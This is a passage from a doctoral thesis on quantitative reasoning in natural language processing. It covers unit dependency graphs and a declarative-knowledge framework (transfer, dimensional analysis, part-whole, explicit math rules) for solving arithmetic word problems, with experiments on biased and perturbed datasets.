leads to a drop in performance, indicating that both vertex and edge information of UDGs assist in math problem solving. Note that setting both λVertex and λEdge to 0, is equivalent to LCA++. SingleEq performs worse than other systems, since it does not handle irrelevant quantities in a problem. In general, reduction of lexical overlap adversely affects the performance of most systems. The reduction of template overlap does not affect performance as much. This is due to the limited number of equation templates found in arithmetic problems. Introduction of UDGs make the system more robust to reduction of both lexical and template overlap. In particular, they provide an absolute improvement of 5% in both AllArithLex and allArithTmpl datasets (indicated by difference of LCA++ and UnitDep results). For the sake of completeness, we also ran our system on the previously used datasets, achieving 1% and 4% absolute improvements over LCA++, in the Illinois dataset [Roy et al., 2015] and the Commoncore dataset [Roy and Roth, 2015] respectively. 7.5.5 Discussion Most of gains of UnitDep over LCA++ came from problems where LCA++ was predicting an operation or an expression that was inconsistent with the units. A small gain (10%) also comes from problems where UDGs help detect certain irrelevant quantities, which LCA++ cannot recognize. Table 7.5 lists some of the examples which UnitDep gets correct but LCA++ does not. Most of the mistakes of UnitDep were due to extraneous quantity detection (around 50%). This was followed by errors due to the lack of math understanding (around 23%). This includes comparison questions like “How many more pennies does John have?”. 82 Problem LCA++ UnitDep At lunch a waiter had 10 customers and 5 of them didn’t leave a tip. If he got $3.0 each from the ones who did tip, how much money did he earn? 10.0-(5.0/3.0) 3.0*(10.0-5.0) The schools debate team had 26 boys and 46 girls on it. If they were split into groups of 9, how many groups could they make? 9*(26+46) (26+46)/9 Melanie picked 7 plums and 4 oranges from the orchard . She gave 3 plums to Sam . How many plums does she have now ? (7+4)-3 (7-3) Isabellas hair is 18.0 inches long. By the end of the year her hair is 24.0 inches long. How much hair did she grow? (18.0*24.0) (24.0-18.0) Table 7.5: Examples of problems which UnitDep gets correct, but LCA++ does not. 7.6 Conclusion In this chapter, we introduce the concept of unit dependency graphs, to model the dependencies among units of numbers mentioned in a math word problem, and the question asked. The dependencies of UDGs help improve performance of an existing arithmetic word problem solver, while also making it more robust to low lexical and template overlap of the dataset. Code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication view/804. 83 Chapter 8 Mapping to Declarative Knowledge 8.1 Introduction Understanding and solving math word problems involves understanding several mathematical concepts, as well as their interaction with the physical world. Consider the arithmetic word problem shown in Fig 8.1, targeted towards elementary school students. To solve the problem, one needs to understand that “apple pies” and “pecan pies” are parts of “pies”, and hence, the number of apple pies and pecan pies needs to be added to get the total number of pies. Similarly, detecting that “5” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by 5 to get the answer. Besides part-whole relationship and dimensional analysis, there are several other concepts needed to support the reasoning in word problems. Some of them involve understanding comparisons, transactions, as well as application of math or physics formulas. We refer to any such formulas or concepts as “math domain knowledge”. In the last chapter, we show how dimensional analysis knowledge can be integrated into math problem solving. In this chapter, we introduce a more general framework to incorporate any “math domain knowledge” into word problem solving. For combining a pair of numbers or math sub-expressions, our method first predicts the type of knowledge that is needed for it (like subset relationship, dimensional analysis, etc), and then predicts a declarative rule under that knowledge type to infer the mathematical operation. We model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps of our method. The proposed approach has some clear advantages compared to existing work on word problem solving. First, it provides a way to relax the tight coupling between the “language understanding” component and the “Math knowledge” component. This relaxation facilitates better generalization, as we show, and, opens the ways to incorporate additional, more sophisticated math knowledge from different domains. Second, it provides interpretability of the solution, without expensive annotations. Our method predicts a declarative 84 Arithmetic Word Problem Mrs. Hilt baked pies last weekend for a holiday dinner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Solution (16 + 14)/5 = 6 Type of Knowledge needed for Each Operation Figure 8.1: An example arithmetic word problem and its solution, along with the type of domain knowledge required to generate each operation of the solution knowledge based inference rule for each operation needed in the solution. These rules provide an explanation for the operations performed. In particular, it learns to predict these rules without explicit annotations for them. Third, each individual operation in the solution expression can be generated independently by a separate knowledge type. This allows our method to use multiple knowledge types in the same problem. We show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. Our method, on the other hand, learns the right abstractions even in the presence of biases in the data. We also introduce a novel approach to gather word problems without these biases, creating a new dataset of 1492 problems. The next section introduces our representation of domain knowledge as well as the specific types of knowl- edge we use for arithmetic word problems. Section 8.3 describes our model to predict answers using domain knowledge, and provides details of our training paradigm. Finally, we provide experimental evaluation of our proposed method in Section 8.5, and then conclude with discussion of related work. 8.2 Knowledge Representation We introduce our representation of domain knowledge in this section. We organize any knowledge hierarchi- cally in two levels - knowledge types and declarative rules. A knowledge type is a concept or phenomenon which needs to be understood to apply reasoning over numbers. Examples of knowledge types include part- whole relations, dimensional analysis, etc. Under each knowledge type, there are a few declarative rules, which dictate which operation is needed in a particular context. An example of a declarative rule under 85 part-whole knowledge type can be that if two numbers two numbers quantify “parts” of a larger quantity, the operation between them must be addition. These rules often use knowledge type specific predicates, which we exemplify in the following subsections. Since this work focuses on arithmetic word problems, we consider 4 knowledge types which are most common in these problems, as follows: 1. Transfer: This involves understanding the transfer of objects from one person to another. For example, the action described by the sentence “Tim gave 5 apples to Jim”, results in Tim losing “5 apples” and Jim gaining “5 apples”. 2. Dimensional Analysis: This involves understanding compatibility of units or dimensions of numbers. For example, “30 pies” can be divided by “5 pies per row” to get the number of rows. 3. Part-Whole Relation: This includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. For example, the problem in Section ?? involves understanding “pecan pies” and “apple pies” are parts of “pies”, and hence must be added. 4. Explicit Math: Often word problems mention explicit math relationships among the quantities or entities in the problem. For example, “Jim is 5 inches taller than Tim”. This knowledge type captures the reasoning needed for such explicit math relationships. Each of these knowledge types comprises a small number of declarative rules which determine the math operations; we describe them below. 8.2.1 Transfer Consider the following excerpt of a word problem exhibiting a transfer phenomenon: “Stephen owns 5 books. Daniel gave him 4 books. The goal of the declarative rules is to determine which operation is required between 5 and 4, given that we know that a transfer is taking place. We note that a transfer usually involves two entities, which occur as subject and indirect object in a sentence. Also, the direction of transfer is determined by the verbs associated with the entities. We define a set of variables to denote these properties; we define as Subj1, Verb1, IObj1 the subject, verb and indirect object associated with the first number, and as Subj2, Verb2, IObj2 the subject, verb and indirect object related to the second number. For the above example, the assignment of the variables are shown below: 86 [Stephen]Subj1 [owns]V erb1 5 books. [Daniel]Subj2 [gave]V erb2 [him]IObj2 4 books. In order to determine the direction of transfer, we require some classification of verbs. In particular, we classify each verb into one of five classes, namely HAVE, GET, GIVE, CONSTRUCT and DESTROY. The HAVE class constitutes all verbs which signify the state of an entity, such as “have”, “own”, etc. The GET class contains verbs which indicate the gaining of things for the subject. Examples of such verbs are “acquire”, “borrow”, etc. The GIVE class contains verbs which indicate the loss of things for the subject. Verbs like “lend”, “give” belong to this class. Finally CONSTRUCT class constitutes verbs indicating construction or creation, like “build”, “fill”, etc., while DESTROY indicates destruction related verbs like “destroy”, “eat”, “use”, etc. This verb classification is largely based on the work of [Hosseini et al., 2014]. Finally, the declarative rule applicable for our example has the following form: [Verb1 ∈ HAVE] ∧ [Verb2 ∈ GIVE] ∧ [Coref(Subj1, IObj2)] ⇒ Addition where Coref(A,B) is true when A and B represent the same entity or are coreferent, and is false otherwise. Verb1 is “own” and hence [Verb1 ∈ HAVE] is true. Verb2 is “give” and hence [Verb2 ∈ GIVE] is true. Finally, Subj1 and IObj2 both refer to Stephen, so [Coref(Subj1, IObj2)] returns true. As a result, the above declarative rule dictates that addition should be performed between 5 and 4. We have 18 such inference rules for transfer, covering all combinations of verb classes and Coref() values. All these rules generate addition or subtraction operations. 8.2.2 Dimensional Analysis We now look at the use of dimensional analysis knowledge in word problem solving. To use dimensional analysis, one needs to extract the units of numbers as well as the relations between the units of numbers. Consider the following excerpt of a word problem: “Stephen has 5 bags. Each bag has 4 apples. Knowing that the unit of 5 is “bag” and the effective unit of 4 is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. To capture these dependencies, we first introduce a few terms. Whenever a number has a unit of the form “A per B”, we refer to “A” as the unit of the number, and refer to “B” as the rate component of the number. In our example, the unit of 4 is “apple”, and the rate component of 4 is “bag”. We define variables Unit1 and Rate1 to denote the unit and the rate component of the first number respectively. We similarly 87 define Unit2 and Rate2. For the above example, the assignment of variables are shown below: Stephen has 5 [bags]Unit1. Each [bag]Rate2 has 4 [apples]Unit2. Finally, the declarative rule applicable for our example has the following form: [Coref(Unit1, Rate2)] ⇒ Multiplication We have only 3 rules for dimensional analysis knowledge type. They generate multiplication or division operations. 8.2.3 Explicit Math In this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in “Stephen has 5 apples. Daniel has 4 more apples than Stephen”. To detect such math relationships, we create a small list of patterns which indicate explicit math relationships, as well as, categorize these patterns based on the operation they imply. For example, the list for addition (ADD) has the patterns “more than”, “taller than”, “heavier than”, etc, and the list for subtraction (SUB) has patterns like “less than”, “shorter than”, etc. We define by Math1 and Math2 any explicit math term associated with the first and second numbers respectively. As was the case for transfers, we also define Subj1, IObj1, Subj2, and IObj2 to denote the entities participating in the math relationship. The assignment of these variables in our example is shown below. [Stephen]Subj1 has 5 apples. [Daniel]Subj2 has 4 [more apples than]Math2 [Stephen]IObj2. Finally the declarative rule that applies is: [Coref(Subj1, IObj2)] ∧ [Math2 ∈ ADD] ⇒ Addition We have only 7 rules for the explicit math knowledge type. 8.2.4 Part-Whole Relation Understanding part-whole relationship entails understanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). For example, in the excerpt “Mrs. Hilt 88 has 5 pecan pies and 4 apple pies”, determining that pecan pies and apple pies are parts of all pies, helps inferring that addition is needed. We have 3 simple rules which directly map from Hyponym, Hypernym or Sibling detection to the corresponding math operation. For the above example, the applicable declarative rule is: [Sibling(Number1, Number2)] ⇒ Addition The rules for part-whole knowledge type can generate addition and subtraction operations. Note that all the declarative rules are designed to determine an operation between two numbers only. We introduce a strategy in Section 8.3, which facilitates combining sub-expressions with these declarative rules. A complete list of declarative rules is added to the appendix. 8.3 Mapping of Word Problems to Declarative Knowledge Word Problem Tim ’s cat had 6 kittens . He gave 3 to Jessica. Then Sara gave him 9 kittens . How many kittens does he now have ? Knowledge based Answer Derivation Word Problem Mrs. Hilt baked pies last weekend for a holiday dinner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Knowledge based Answer Derivation Table 8.1: Two examples of arithmetic word problems, and derivation of the answer. For each combination, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation. Given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. In order to derive the expression y from the word problem x, we leverage declarative 89 knowledge types and declarative rules that we introduced in Section 8.2. In order to combine two numbers mentioned in x, we first predict a domain knowledge type k, and then we choose a declarative knowledge rule r from k. The rule r generates the math operation needed to combine the two numbers. Consider the first example in Table 8.1. To combine 6 and 9, we first decide on the transfer knowledge type, and then choose an appropriate rule under transfer to generate the operation. Next we need to combine the sub-expression (6 + 9) with the number 3. However, our inference rules were designed for the combination of two numbers only. In order to combine a sub-expression, we choose a representative number from the sub-expression, and use that number to determine the operation. In our example, we choose the number 6 as the representative number for (6 + 9), and decide the operation between 6 and 3, following a similar procedure as before. This operation is now used to combine (6 + 9) and 3. The representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. We follow a simple heuristic to choose a representative number from a sub-expression: 1. For transfers and part-whole relationship, we choose the representative number of the left subtree. 2. In case of rate relationship, we choose the number which does not have a rate component. 3. In case of explicit math, we choose the number which is not directly associated with the explicit math expression. 8.3.1 Scoring Answer Derivations Given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. We refer to the set of operations used in an expression y as �(y). Each operation o in �(y) is generated by first choosing a knowledge type ko, and then selecting a declarative rule ro from that knowledge type. In order to discriminate between multiple candidate solution expressions of a word problem x, we score them using a linear model over features extracted from the derivation of the solution. Our scoring function has the following form: Score(x,y) = ∑ o∈�(y) wkφk(x,k o) + wrφr(x,r o) where φk(x,k o) and φk(x,r o) are feature vectors related to knowledge type ko, and declarative rule ro, 90 respectively, and wk and wr are the corresponding weight vectors. The term wkφk(x,k o) is the score for the selection of ko, and the term wrφr(x,r o) is the score for the selection of ro. Finally, the total score is the sum of the scores of all knowledge type and rule choices, over all operations of y. 8.3.2 Learning We wish to estimate the parameters of the weight vectors wk and wr, such that our scoring function assigns a higher score to the correct math expression, and a lower score to other competing math expressions. For learning the parameters, we assume access to word problems paired with the correct math expression. We show in Section 8.4 that certain simple heuristics and rate component annotations can be used to create somewhat noisy annotations for knowledge types for operations. Hence, we will assume for our formulation, access to knowledge type supervision as well. We thus assume access to m examples of the following form: {(x1,y1,{ko}o∈�(y1)), (x2,y2,{ko}o∈�(y2)), . . . , (xm,ym,{ko}o∈�(ym))}. We do not have any supervision for declarative rule selection, which we model as a latent variable. Two Stage Learning: A straightforward solution for our learning problem could be to jointly learn wk and wr using latent structured SVM. However, we found that this model does not perform well. Instead, we chose a two stage learning protocol. At the first stage, we only learn wr, the weight vector for scoring the declarative rule choice. Once learned, we fix the parameters for wr, and then learn the parameters for wk. In order to learn the parameters for wr, we solve the following optimization problem: min wr 1 2 ||wr||2 + C m∑ i=1 ∑ o∈�(yi) [ max r̂∈ko wr ·φr(x, r̂) − max r̂∈ko,r̂⇒o wr ·φr(x, r̂) ] where r̂ ∈ ko implies that r̂ is a declarative rule of the knowledge type ko, and r̂ ⇒ o signify that the declarative rule r̂ generates operation o. The above objective is similar to that of latent structured SVM. For each operation o in the solution expression yi, the objective tries to minimize the difference between the highest scoring rule from its knowledge type ko, and highest scoring rule from ko which explains or generates the operation o. Next we fix the parameters of wr, and solve the following optimization: min wk 1 2 ||wk||2 + C m∑ i=1 [ max y∈Y Score(xi,y) −Score(xi,yi) ] This is equivalent to a standard structured SVM objective. Note that fixing the parameters of wr determines the scores for rule selection, removing the need for any latent variables at this stage. 91 8.3.3 Inference Given an input word problem x, inferring the best math expression involves computing the following: arg max y∈Y Score(x,y) where Y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. The size of Y is exponential in the number of quantities mentioned in x. As a result, it becomes computationally intractable to score each element of Y and pick the highest scoring expression. We instead perform approximate inference using beam search. We initialize the beam with the set E of all numbers mentioned in the problem x. At each step of the beam search, we choose two numbers (or sub-expressions) e1 and e2 from E, and then select a knowledge type and and a declarative rule to infer an operation o. We create a new sub-expression e3 by combining the sub-expressions e1 and e2 with operation o. We finally create a new set E ′ from E, by removing e1 and e2 from it, and adding e3 to it. We remove E from the beam, and add all such modified sets E ′ to the beam. We continue this process till all sets in the beam have only one element in them. We choose the highest scoring expression among these elements as the solution expression. 8.4 Model and Implementation Details We describe in this section several details of our model related to the supervision and features we use for training. 8.4.1 Supervision Each word problem in our dataset is annotated with the solution math expression, along with alignment of numbers from the problem to the solution expression. In addition, we also have annotations for the numbers which possess a rate component. An example is shown in Fig 8.2. 92 Problem: Mrs. Hilt baked pies last weekend for a holiday dinner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Number List: 16, 14, 5 Solution: (16[1] + 14[2])/5[3] = 6 Rates: 5 Figure 8.2: Annotations in our dataset. Number List refers to the numbers detected in the problem. The subscripts in the solution indicate the position of the numbers in the number list. This is the same level of supervision used in [Roy and Roth, 2017]. Many of the annotations can be ex- tracted semi-automatically. The number list is extracted automatically by a number detector, the alignments require human supervision only when the same numeric value is mentioned multiple times in the problem. Most of the rate component annotations can also be extracted automatically, see [Roy and Roth, 2017] for details. We apply a few heuristics to obtain noisy annotations for the knowledge types of operations. Consider the case for combining two numbers num1 and num2, by operation o. We apply the following rules: 1. If we detect an explicit math pattern in the neighborhood of num1 or num2, we assign knowledge type ko to be Explicit Math. 2. If o is multiplication or division, and one of num1 or num2 has a rate component, we assign ko to be Dimensional Analysis. 3. If o is addition or subtraction, we check if the dependent verb of both numbers are identical. If they are, we assign ko to be Part-Whole relationship, otherwise, we assign it to be Transfer. The annotations obtained via these rules are of course not perfect. However, we tested a small sample of these annotations, and found only around 3% of them to be wrong. As a result, we assume these annotations to be correct, and formulate our learning problem accordingly. 8.4.2 Features We use two feature functions φk(x,k o) and φr(x,r o), where x is the input word problem, and ko and ro are the knowledge type and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: 93 1. If ro contains Coref(·) function, we add features related to similarity of the arguments of Coref(·), for example, word overlap, whether they constitute a pronoun, etc. 2. For part-whole relationships, we add indicators for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (Hyponymy, Hypernymy, Sibling). 3. Unigrams from the neighborhood of numbers being combined. Finally, φk(x,k o) generates the following features: 1. If ko is related to dimensional analysis, we add features indicating whether a rule based system detected a rate component in the combining numbers. 2. If ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. Note that these features capture several interpretable functions like coreference, hyponymy, etc. We do not learn three components of our system – verb classification for transfer knowledge, categorization of explicit math terms, and irrelevant number detection. For verb classification, we use a seed list of around 10 verbs for each category. Given a new verb v, we choose the most similar verb v′ from the seed lists according to Glove vector [Pennington et al., 2014] based similarity . We assign v the category of v′. Note that this can be replaced by a learned component (as in [Hosseini et al., 2014]). However we found seed list based categorization to work well in most cases. For explicit math, we check for a small list of patterns to detect and categorize math terms. Note that for both the cases above, we still have to learn Coref(·) function to determine the final operation. Finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. Again, this can be replaced by a learned model (as in [Roy and Roth, 2015]). 8.5 Experiments In this section, we experimentally evaluate our proposed approach, and perform a detailed analysis of the results. 8.5.1 Results on Existing Dataset We first evaluate our approach on the existing datasets of AllArith, AllArithLex, and AllArithTmpl 94 [Roy and Roth, 2017]. AllArithLex and AllArithTmpl are subsets of the AllArith dataset, created to test the robustness to new vocabulary, and new equation forms respectively. We compare to the top word problem solvers which can handle arithmetic word problems. They are as follows: 1. Template : Template based algebra word problem solver of [Kushman et al., 2014]. 2. LCA++ : System of [Roy and Roth, 2015] based on lowest common ancestors of math expression trees. 3. UnitDep: Unit dependency graph based solver of [Roy and Roth, 2017]. We refer to our approach as Knowledge. The first few columns of Table 8.2 shows the performance of the systems on the aforementioned datasets. The performance of Knowledge is on par or lower than some of the existing systems. We analyzed the performance of the systems, and found most of them to be not robust to perturbations of the problem text; Table 8.3 shows a few examples. We further analyzed the datasets, and identified several biases in the problems (in both train and test). Systems which remember these biases get an undue advantage in evaluation. For example, the verb “give” only appears with subtraction, and hence the models are learning an erroneous correlation of “give” with subtraction. Since the test also exhibit the same bias, these systems get all the “give”-related questions correct. However, they fail to solve the problem in Table 8.3, where “give” results in addition. 95 System AllArith AllArith Lex AllArith Tmpl Aggregate Aggregate Lex Aggregate Tmpl Train on AllArith, Test on Perturb Template 71.96 ± 3.12 64.09 ± 5.56 70.64 ± 1.17 54.62 ± 2.32 45.05 ± 4.48 54.69 ± 2.22 24.2 LCA++ 78.34 ± 2.59 66.99 ± 4.21 75.66 ± 4.72 65.21 ± 4.21 53.62 ± 5.01 63.0 ± 0.96 43.57 UnitDep 79.67 ± 1.95 71.33 ± 3.52 77.11 ± 5.0 69.9 ± 4.57 57.51 ± 5.17 68.64 ± 2.16 46.29 Knowledge 77.86 ± 1.27 72.53 ± 2.99 74.7 ± 4.38 73.32∗ ± 2.31 66.63∗ ± 4.75 68.62 ± 4.98 65.66∗ Table 8.2: Accuracy in solving arithmetic word problems. All columns except the last report 5-fold cross validation results. ∗ indicates statistically significant improvement (p = 0.05) over second highest score in the column. Problem Systems which solved correctly Trained on AllArith Trained on Aggre- gate Adam has 70 marbles . Adam gave 27 marbles to Sam . How many marbles does Adam have now ? Template, UnitDep, LCA, Knowledge LCA, UnitDep, Knowledge Adam has 70 marbles . Sam gave 27 marbles to Adam . How many marbles does Adam have now ? Knowledge Template, Knowledge Adam has 5 marbles . Sam has 6 more marbles than Adam . How many marbles does Sam have ? LCA, UnitDep, Knowledge LCA, UnitDep, Knowledge Adam has 11 marbles . Adam has 6 more marbles than Sam . How many marbles does Sam have ? Template, Knowledge Template, Knowledge Table 8.3: Pairs of pertubed problems, along with the systems which get them correct 96 8.5.2 New Dataset Creation In order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. These new word problems are created by perturbing the original problems minimally, such that the answer is different from the original problem. For each word problem p with an answer expression a in our original dataset AllArith, we replace one operation in a to create a new math expression a′. We ask annotators to modify problem p minimally, such that a′ is now the solution to the modified word problem. We create a′ from a either by replacing an addition with subtraction or vice versa, or by replacing multiplication with division or vice versa. We do not replace addition and subtraction with multiplication or division, since there might not be an easy perturbation that supports this conversion. We manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. This procedure gave us a set of 661 new word problems, which we refer to as Perturb. Finally we augment AllArith with the problems of Perturb, and call this new dataset Aggregate. Aggregate has a total of 1492 problems. The addition of Perturb problems ensures that the dataset now has problems with similar lexical items generating different answers. This minimizes the bias that we discussed in subsection 8.5.1. To quantify this, consider the probability distribution over operations for a quantity q, given that word w is present in the neighborhood of the number q. For an unbiased dataset, you will expect the entropy of this distribution to be high, since the presence of a single word in a number neighborhood will seldom be completely informative for the operation. We compute the average of this entropy value over all numbers and neighborhood words in our dataset. AllArith and Perturb have an average entropy of 0.34 and 0.32 respectively, whereas Aggregate’s average entropy is 0.54, indicating that, indeed, the complete data set is significantly less biased. 8.5.3 Generalization from Biased Dataset First, we evaluate the ability of systems to generalize from biased datasets. We train all systems on AllArith, and test them on Perturb (which was created by perturbing AllArith problems). The last column of Table 8.2 shows the performance of systems in this setting. Knowledge outperforms all other systems in this setting with around 19% absolute improvement over UnitDep. This shows that declarative knowledge allows the system to learn the correct abstractions, even from biased datasets. 97 8.5.4 Results on the New Dataset Finally, we evaluate the systems on the Aggregate dataset. Following previous work [Roy and Roth, 2017], we compute two subsets of Aggregate comprising 756 problems each, using the MAWPS [Koncel-Kedziorski et al., 2016] system. The first, called AggregateLex, is one with low lexical repititions, and the second called AggregateTmpl is one with low repititions of equation forms. We also evaluate on these two subsets on a 5-fold cross-valiation. Columns 4-6 of Table 8.2 show the performance of systems on this setting. Knowledge significantly outperforms other systems on Aggregate and AggregateLex, and is similar to UnitDep on AggregateTmpl. There is a 9% absolute improvement on AggregateLex, showing that Knowledge is significantly more robust to low lexical overlap between train and test. The last column of Table 8.3 also shows that the other systems do not learn the right abstraction, even when trained on Aggregate. 8.5.5 Analysis Table 8.4 shows examples of problems which Knowledge gets right, but UnitDep does not. The gains can be attributed to the injection of declarative knowledge in our system. Earlier systems like UnitDep try to learn the reasoning required for these problems from the data alone. This is often difficult in the presence of limited data, and noisy output from NLP tools. In contrast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. This considerably reduces the complexity of the target function to be learnt, and hence we end up with a more robust model. A weakness of our method is the requirement to have all the relevant declarative knowledge during training. Many of the component functions (like coreference) are learnt through latent alignments with no explicit annotations. If too many problems are not explained by the declarative knowledge, the model will learn noisy alignments for the component functions. 98 Rachel was organizing her book case making sure each of the shelves had exactly 9 books on it. If she had 6 shelves of mystery books and 2 shelves of picture books, how many books did she have total? Tim’s cat had kittens. He gave 3 to Jessica and 6 to Sara . He now has 9 kittens . How many kittens did he have to start with ? Mrs. Snyder made 86 heart cookies. She made 36 red cookies, and the rest are pink. How many pink cookies did she make? Table 8.4: Examples which Knowledge gets correct, but UnitDep does not. Table 8.5 shows the major categories of errors with examples. 26% of the errors are due to extraneous number detection. We use a rules based on units of numbers, to detect such irrelevant numbers. As a result, we fail to detect numbers which are irrelevant due to other factors, like associated entities, or associated verb. We can potentially expand our rule based system to detect those, or replace it by a learned module like [Roy and Roth, 2015]. Another major source of errors is parsing of rate components, that is, understanding “earns $46 cleaning a home” should be normalized to “46$ per home”. Although we learn a model for coreference function, we make several mistakes related to coreference. For the example in Table 8.5, we fail to detect the coreference between “team member” and “people”. Irrelevant Number Detection (26%) Sally had 39 baseball cards, and 9 were torn. Sara bought 24 of Sally’s baseball cards . How many baseball cards does Sally have now ? Parsing Rate Compo- nent (26%) Mary earns $46 cleaning a home. How many homes did she clean, if she made 276 dollars? Coreference (22%) There are 5 people on the Green Bay High track team. If a relay race is 150 meters long, how far will each team member have to run? Table 8.5: Examples of errors made by Knowledge 8.6 Related Work Our work is primarily related to three major strands of research - automatic word problem solving, semantic parsing, as well as approaches incorporating background knowledge in learning. Automatic Word Problem Solving There has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. [Hosseini et al., 2014] and 99 [Mitra and Baral, 2016] focus on addition, subtraction problems; [Roy and Roth, 2015], [Roy and Roth, 2017] as well as this work focus on arithmetic word problems; [Koncel-Kedziorski et al., 2015] looks at single equa- tion problems, and finally [Kushman et al., 2014] handles general algebra word problems. Some of these ap- proaches also try to incorporate some form of declarative or domain knowledge. [Hosseini et al., 2014] incor- porates the transfer phenomenon by classifying verbs; [Mitra and Baral, 2016] maps problems to a set of for- mulas. Both require extensive annotations for intermediate steps (verb classification for [Hosseini et al., 2014], alignment of numbers to formulas for [Mitra and Baral, 2016], etc). In contrast, our method can handle a more general class of problems, while training only requires problem-equation pairs coupled with rate com- ponent annotations. [Roy and Roth, 2017] focus on only incorporating dimensional analysis knowledge, and handle the same class of problems as we do. In contrast, our method provides a general framework for incor- porating any form of declarative knowledge, exemplified here by incorporating 4 types of domain knowledge. Semantic Parsing Our work is also related to learning semantic parsers from indirect supervision [Clarke et al., 2010, Liang et al., 2011]. The general approach here is to learn mapping of sentences to logical forms, with the only supervision being the response of executing the logical form on a knowledge base. Similarly we learn to select declarative rules with only the final operation as supervision (and not which rule generated it). However, in contrast to the semantic parsing work, selection of each declarative rule usually requires reasoning across multiple sentences. Also, we do not require an explicit grounding of words or phrases to logical variables. Background Knowledge in Learning Approaches to incorporate knowledge in learning started with Explanation based Learning (EBL) [DeJong, 1993, DeJong, 2014]. EBL uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our domain knowledge. More recent approaches tried to incorporate knowledge in the form of constraints on the output [Chang et al., 2007, Chang et al., 2012, Ganchev et al., 2010]. 8.7 Conclusion In this chapter, we introduce a framework for incorporating declarative knowledge in word problem solving. In order to combine numbers or math expressions, our system selects an appropriate knowledge type, and then an appropriate declarative rule that is used to infer the necessary math operation. The selection of the declarative rule for each operation provides interpretability for each operation selected. Our knowledge based approach outperforms all other systems, as well as learns better abstraction from biased datasets. Beyond better generalization, we believe that relaxing the coupling between the natural language component and 100 the “math” knowledge, also promises to eventually, simplify extending our approach to deal with a broader range of math phenomena. The current approach allows declarative rules that relate to two numbers or sub- expressions at a time. Future work will involve extending this approach to include rules involving multiple numbers or sub-expressions. 101 Chapter 9 Conclusion and Future Work 9.1 Summary Quantities play an important role in everyday communication. Humans naturally perform a lot of quantita- tive reasoning while reading newspapers, discussing election results with friends, and planning their budget for a vacation, etc. As a result, quantitative reasoning is essential for complete language understanding. However, in spite of its abundance in everyday conversations and interactions, little work from NLP has focused on analyzing quantitative reasoning. In this thesis, we take the first few steps in that direction. We investigate several challenges for which standard NLP tools cannot be easily used for quantitative reasoning. We address each of these challenges, outlining several key technical ideas. Finally, we also build end to end robust quantitative reasoning systems, and make them available for the research community. We begin by looking at quantities at a local level in Chapter 4. We develop a computational approach to extract quantities mentioned in free form text along with its related modifiers, and finally normalize the quantity to a standardized form. We show that correct detection and normalization can help perform several quantitative reasoning inferences, as exemplified by the Quantity Entailment task. We investigate sentence level numeric relations in Chapter 5. An important challenge for capturing numeric relations is identifying the variables which participate in the relation. To capture this, we formulate the Equation Parsing task. We show that leveraging projectivity structures as well as using a pipeline of structured predictors can provide effective relation extraction systems. We also show that standard syntactic and semantic parsers cannot be effectively used in this domain, which motivates developing new approaches for these problems. We develop a word problem solver for arithmetic problems in Chapter 6. The key idea is to effectively decompose the output structure in terms of the lowest common ancestors of expression trees. This decompo- sition allows us to perform reasoning for pairs of numbers, and effectively compose those pairwise answers, rather than considering all the numbers at a time. This helps us achieve state of the art results in arithmetic 102 word problem solving. We address the challenge of incorporating domain knowledge in quantitative reasoning. First, to incor- porate dimensional analysis knowledge, we introduce the concept of “unit dependency graphs”. We again show its effectiveness in the domain of arithmetic word problems. We show that learning to jointly predict unit dependency graphs along with the math solution, improves the robustness of the solver. We further develop a general framework to integrate any declarative knowledge into math word problem solvers. We integrate several common math domain knowledge using this framework. We show that the knowledge based method learns robust models from limited data, as well as, learns the right abstraction from biased datasets. These solutions address a wide range of challenges for quantitative reasoning. However there are a few limitations outlined in the following section. 9.2 Limitations A key limitation of our math solver work is that we focus on arithmetic word problems. The assumption is that we can combine the numbers in the problem with basic operations to get to the answer. This is usually true for word problems seen in elementary school. However there are various other forms of word problems, which require building multiple equations with several variables. Unfortunately, considering multiple equations exponentially blows up the output space, which makes learning semantic structures from limited data impossible. A similar limitation exists in our equation parsing work. We make a simplifying assumption that each sentence expresses a relation among at most two variables, and uses each of the numbers in the sentence at most once. Although we observed that most numeric relations follow this pattern, there are a few exceptions. Currently our model will not handle these cases, without some minor modifications. 9.3 Future Directions The thesis shows directions to some promising areas of future research. We outline them in the following subsections. 103 9.3.1 Commonsense Quantitative Reasoning The thesis looks at quantitative reasoning based on local neighborhood in quantity entailment, as well as across sentences in the context of math word problems. However there are several commonsense reasoning with respect to quantities, which are not captured by the tasks discussed in this thesis. The challenge is to acquire associations of several concepts with numbers. For example, “The water is hot” implies the temperature of the water must be a high value, “The water is slightly warm” implies that the temperature is a bit high, but not as high as the last case. Also, a sentence like “I could not afford the television, so I bought the radio.” implies that the cost of the television is higher than that of the radio. An interesting direction is to systematically study these inference problems. A reasonable approach can be to generalize the definition of the quantity entailment task to capture effects of the entire sentence, and not single 